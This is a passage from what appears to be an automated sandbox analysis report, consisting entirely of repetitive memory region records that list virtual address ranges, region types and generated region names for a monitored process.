"private_0x0000000000460000" filename = "" Region: id = 6493 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6494 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6495 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6496 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6497 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6498 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6499 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6500 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6501 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 6502 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6503 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6504 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6505 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6506 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6507 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6508 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6509 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6510 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6511 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6512 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6513 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6514 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6515 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6516 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6517 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 6518 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6519 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6520 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6521 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6522 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6523 start_va = 0x90d0000 end_va = 0x91d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6524 start_va = 0xafd0000 end_va = 0xb0d8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6525 start_va = 0x90d0000 end_va = 0x91defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6526 start_va = 0xafd0000 end_va = 0xb0e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6527 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6528 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6529 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6530 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6531 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6532 start_va = 0x90d0000 end_va = 0x91ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6533 start_va = 0xafd0000 end_va = 0xb0e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6534 start_va = 0x90d0000 end_va = 0x91e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6535 start_va = 0xafd0000 end_va = 0xb0e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6536 start_va = 0x90d0000 end_va = 0x91f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6537 start_va = 0xafd0000 end_va = 0xb0eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6538 start_va = 0x90d0000 end_va = 0x91f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6539 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6540 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6541 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6542 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6543 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6544 start_va = 0xafd0000 end_va = 0xb0f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6545 start_va = 0x90d0000 end_va = 0x91f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6546 start_va = 0xafd0000 end_va = 0xb0fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6547 start_va = 0x90d0000 end_va = 0x9201fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6548 start_va = 0xafd0000 end_va = 0xb0f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6549 start_va = 0x90d0000 end_va = 0x91f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6550 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6551 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6552 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6553 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6554 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6555 start_va = 0xafd0000 end_va = 0xb100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6556 start_va = 0x90d0000 end_va = 0x9208fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6557 start_va = 0xafd0000 end_va = 0xb107fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6558 start_va = 0x90d0000 end_va = 0x920efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6559 start_va = 0xafd0000 end_va = 0xb10bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6560 start_va = 0x90d0000 end_va = 0x920bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6561 start_va = 0xafd0000 end_va = 0xb118fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6562 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6563 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6564 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6565 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6566 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6567 start_va = 0xc250000 end_va = 0xc390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6568 start_va = 0x90d0000 end_va = 0x920efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 6569 start_va = 0xafd0000 end_va = 0xb114fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6570 start_va = 0xc250000 end_va = 0xc399fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6571 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6572 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6573 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6574 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6575 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6576 start_va = 0xafd0000 end_va = 0xb11dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6577 start_va = 0xc250000 end_va = 0xc3a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6578 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6579 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6580 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6581 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6582 start_va = 0xafd0000 end_va = 0xb124fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6583 start_va = 0xc250000 end_va = 0xc3abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6584 start_va = 0xafd0000 end_va = 0xb12dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6585 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6586 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6587 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6588 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6589 start_va = 0xc250000 end_va = 0xc3b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6590 start_va = 0xafd0000 end_va = 0xb125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6591 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 6592 start_va = 0xc250000 end_va = 0xc3b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6593 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6594 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6595 start_va = 0xafd0000 end_va = 0xb132fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6596 start_va = 0xc250000 end_va = 0xc3b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6597 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6598 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6599 start_va = 0xafd0000 end_va = 0xb131fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6600 start_va = 0xc250000 end_va = 0xc3b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6601 start_va = 0xafd0000 end_va = 0xb13afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6602 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6603 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6604 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6605 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6606 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6607 start_va = 0xc250000 end_va = 0xc3b9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6608 start_va = 0xafd0000 end_va = 0xb145fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6609 start_va = 0xc250000 end_va = 0xc3c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6610 start_va = 0xafd0000 end_va = 0xb149fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6611 start_va = 0xc250000 end_va = 0xc3cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6612 start_va = 0xafd0000 end_va = 0xb144fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6613 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6614 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6615 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6616 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6617 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6618 start_va = 0xc250000 end_va = 0xc3d4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6619 start_va = 0xafd0000 end_va = 0xb148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afd0000" filename = "" Region: id = 6620 start_va = 0xc250000 end_va = 0xc3d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6621 start_va = 0xc3e0000 end_va = 0xc566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3e0000" filename = "" Region: id = 6622 start_va = 0xc250000 end_va = 0xc3d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6623 start_va = 0xc3e0000 end_va = 0xc571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3e0000" filename = "" Region: id = 6624 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6625 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6626 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6627 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6628 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6629 start_va = 0xc250000 end_va = 0xc3dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6630 start_va = 0xc3e0000 end_va = 0xc56efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3e0000" filename = "" Region: id = 6631 start_va = 0xc250000 end_va = 0xc3ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6632 start_va = 0xc3e0000 end_va = 0xc570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3e0000" filename = "" Region: id = 6633 start_va = 0xc580000 end_va = 0xc718fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c580000" filename = "" Region: id = 6634 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6635 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6636 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6637 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6638 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6639 start_va = 0xc250000 end_va = 0xc3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6640 start_va = 0xc3f0000 end_va = 0xc587fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3f0000" filename = "" Region: id = 6641 start_va = 0xc250000 end_va = 0xc3e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6642 start_va = 0xc3f0000 end_va = 0xc58efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c3f0000" filename = "" Region: id = 6643 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6644 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6645 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6646 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6647 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6648 start_va = 0xc590000 end_va = 0xc732fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c590000" filename = "" Region: id = 6649 start_va = 0xc250000 end_va = 0xc3fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6650 start_va = 0xc400000 end_va = 0xc5adfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c400000" filename = "" Region: id = 6651 start_va = 0xc250000 end_va = 0xc3fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6652 start_va = 0xc400000 end_va = 0xc5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c400000" filename = "" Region: id = 6653 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6654 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6655 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6656 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6657 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6658 start_va = 0x101d0000 end_va = 0x10380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101d0000" filename = "" Region: id = 6659 start_va = 0xc250000 end_va = 0xc406fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6660 start_va = 0xc410000 end_va = 0xc5c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c410000" filename = "" Region: id = 6661 start_va = 0xc250000 end_va = 0xc405fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6662 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6663 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6664 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6665 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6666 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6667 start_va = 0xc410000 end_va = 0xc5cafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c410000" filename = "" Region: id = 6668 start_va = 0xc250000 end_va = 0xc407fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6669 start_va = 0xc410000 end_va = 0xc5cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c410000" filename = "" Region: id = 6670 start_va = 0x101d0000 end_va = 0x10390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000101d0000" filename = "" Region: id = 6671 start_va = 0xc250000 end_va = 0xc41afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6672 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6673 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6674 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6675 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6676 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6677 start_va = 0xc420000 end_va = 0xc5e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c420000" filename = "" Region: id = 6678 start_va = 0xc250000 end_va = 0xc41bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6679 start_va = 0xc420000 end_va = 0xc5eafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c420000" filename = "" Region: id = 6680 start_va = 0xc250000 end_va = 0xc41bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6681 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6682 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6683 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6684 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6685 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6686 start_va = 0xc420000 end_va = 0xc5e9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c420000" filename = "" Region: id = 6687 start_va = 0xc250000 end_va = 0xc412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c250000" filename = "" Region: id = 6688 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6689 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6690 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6691 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6692 start_va = 0x460000 end_va = 0x46efff 